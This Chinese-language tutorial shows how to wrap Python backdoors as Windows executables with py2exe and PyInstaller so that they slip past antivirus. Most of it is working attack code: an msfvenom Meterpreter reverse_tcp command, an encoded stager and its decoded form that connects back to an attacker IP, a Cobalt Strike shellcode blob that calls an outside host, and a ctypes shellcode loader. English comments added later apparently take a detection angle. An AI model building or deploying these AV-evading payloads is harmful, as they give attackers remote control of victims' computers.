使用Python的两种方法进行打包
-
使用Py2exe将py后门转为exe
python环境准备
(1)安装Python 2.7 x86 windows版:
https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
*注意:必须使用x86版本的Python 2.7。即使Windows是x64的,也要安装32位版本,并将python.exe所在目录添加到PATH环境变量。
(2)安装32位Py2exe for python 2.7
https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
在当前文件夹中创建一个setup.py文件,该文件利用Py2exe将py转为exe
#! /usr/bin/env python # encoding:utf-8 from distutils.core import setup import py2exe setup( name = "Meter", description = "Python-based App", version = "1.0", console = ["test.py"], options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}}, zipfile = None )
test.py的内容由msfvenom生成
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f raw -o /tmp/test.py
生成的内容如下
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTMxJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg=='))) 解码后为: import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('192.168.20.131',4444)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s})
name、description、version 是可选项
console = ["test.py"] 表示生成控制台程序,可bypass某些AV。
将test.py和setup.py两个文件放到同一目录下
执行py2exe的打包命令(本页未给出)后,即会在dist目录下生成test.exe
生成的exe如下:
双击上线msf
-
PyInstaller将py转为exe
python环境准备:
pyinstaller同样可以将.py程序打包成Windows下可执行的exe文件。pyinstaller依赖于pywin32,在使用pyinstaller之前应先安装:
(1)pywin32(python2.7版本的32位),安装时一路"下一步"即可。
[https://github.com/mhammond/pywin32/releases]:
(2)pyinstaller 下载后,解压,不用安装,即可使用(我使用的为3.0版本)
[https://github.com/pyinstaller/pyinstaller/releases]:
(3)使用cs生成的py_payload进行加载
cs_payload如下:
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x58\x58\x46\x00\x95\x9c\xc1\xd6\xd0\x87\x49\x94\x17\x39\x97\xde\x5f\x2d\x80\xe8\xeb\xa5\x97\xb8\x05\xdd\xb5\x71\x7f\x20\x14\x82\xa3\xae\x3c\x99\xfc\x36\x0d\x8a\x3b\xd3\xbe\xaa\x1b\xe4\x46\xbb\xd0\x0a\xbe\x19\x44\xd9\x04\x07\x6b\xd1\x6a\xdf\xc9\x56\xc1\xa8\xbe\xbd\x0c\x59\x06\xc3\xdb\x69\xcc\xb4\x7a\x71\xb3\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\
x4e\x55\x53\x29\x0d\x0a\x00\x35\xc3\xb3\x34\x1c\x10\x37\x4d\x32\x02\xee\xdf\x3a\xeb\x3d\x50\x10\xd6\xef\xfb\xb5\xc8\x51\xa9\x11\xee\xaa\xe4\x91\x1a\xf9\x52\x97\x5a\xd9\x36\xae\xc9\x1d\xf9\x0e\x15\xc5\x52\x7d\x3b\xaa\x1b\x0a\xcb\xf8\x60\x84\xcd\xec\x69\x3d\x08\xe0\x4a\x0c\xf2\xb0\x30\x00\x1f\xdc\x22\x4d\x67\x41\x9c\xdc\xaa\x25\x2b\x74\xb3\x30\x4e\x88\x4e\x08\x98\x36\xe2\x40\x6f\xf3\xf7\xd6\xc7\x6c\xf6\xc7\xc3\xa8\x8c\x7f\x80\xea\x99\x44\x86\x80\x7f\xc7\x58\x35\xdf\xe9\xe8\x1b\xa9\xb0\x0f\xaa\x80\x53\xf1\x30\x05\x7f\xb7\xc3\xd7\x2b\xc7\xe3\x66\xb6\xfd\xd7\x60\x67\x4d\x46\xc0\x8b\x6b\xe7\xd6\x0a\xb3\xfd\x99\xe3\x6c\x13\xaa\x17\xdf\xf7\x80\x9b\xab\xf9\x31\xc9\xa1\xe6\x13\x5b\x4b\x72\x10\x5f\xe9\x2d\x5e\x9b\x2b\x46\x50\x35\x35\x02\xe6\x5f\x40\x90\xab\xc8\x5d\x8c\x82\xa2\x2f\xfa\xf5\x8e\x22\x69\x4a\x61\xeb\x4d\x88\x6d\x6f\x99\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x32\x33\x2e\x35\x37\x2e\x31\x39\x31\x2e\x31\x35\x39\x00\x6f\xaa\x51\xc3"
shellcode加载器by_pass.py如下
#! /usr/bin/env python
# encoding:utf-8
import ctypes
def execute():
# Loader: copies the byte blob below into a freshly allocated executable
# region, starts a thread at its first byte and blocks until that thread exits.
# NOTE(review): the page shows no indentation inside this function; the
# original layout is kept as-is, and the line containing "省略一部分" is the
# author's placeholder for elided bytes, not valid Python.
# Detection view: the API sequence VirtualAlloc(PAGE_EXECUTE_READWRITE) ->
# RtlMoveMemory -> CreateThread issued from a Python interpreter (or from a
# py2exe/PyInstaller stub, as the page describes) is a widely monitored
# pattern, and the literal is stored unobfuscated in the script, so it
# presumably survives into the frozen exe where a string/byte scan finds it.
# The author labelled the blob "Bind shell"; its middle is elided on this
# page, so the payload type cannot be confirmed from here.
shellcode = bytearray(
# bytearray(str) only works on Python 2; Python 3 raises TypeError here.
"\xbe\x24\x6e\x0c\x71\xda\xc8\xd9\x74\x24\xf4\x5b\x29"
"\xc9\xb1\x99\x31\x73\x15\x03\x73\x15\x83\xeb\xfc\xe2"
……………………省略一部分…………………………
"\xd1\xb4\xdb\xa8\x6d\x6d\x10\x17\x33\xf9\x2c\x93\x2b"
"\x0b\xcb\x94\x1a\xd9\xfd\xc7\x78\x26\xb3\x57\xea\x6d"
"\x37\xa5\x48\xea\x47\xf6\x81\x90\x07\xc6\x62\x9a\x56"
"\x13"
)
# Allocate a region the size of the blob; 0x3000 = MEM_COMMIT | MEM_RESERVE,
# 0x40 = PAGE_EXECUTE_READWRITE (an RWX allocation, a common EDR/AV signal).
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Expose the bytearray as a C char array sharing its buffer (no copy) so
# RtlMoveMemory can read from it.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# New thread whose start address (third argument) is the allocation itself.
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# -1 is INFINITE: the process stays alive for as long as the payload thread
# runs, so the host process is the natural place to look for it.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
ctypes.c_int(-1))
# Script entry point: run the loader only when the file is executed directly,
# not when it is imported.
if __name__ == "__main__":
execute()
将by_pass.py文件放入pyinstaller目录下运行(注意下一条命令中写的是bypass_py.py,实际文件名需与命令一致)
py -2 pyinstaller.py -F -w bypass_py.py
该目录下会生成by_pass目录,其中的dist子目录中则生成exe文件
双击运行,上线cobaltstrike。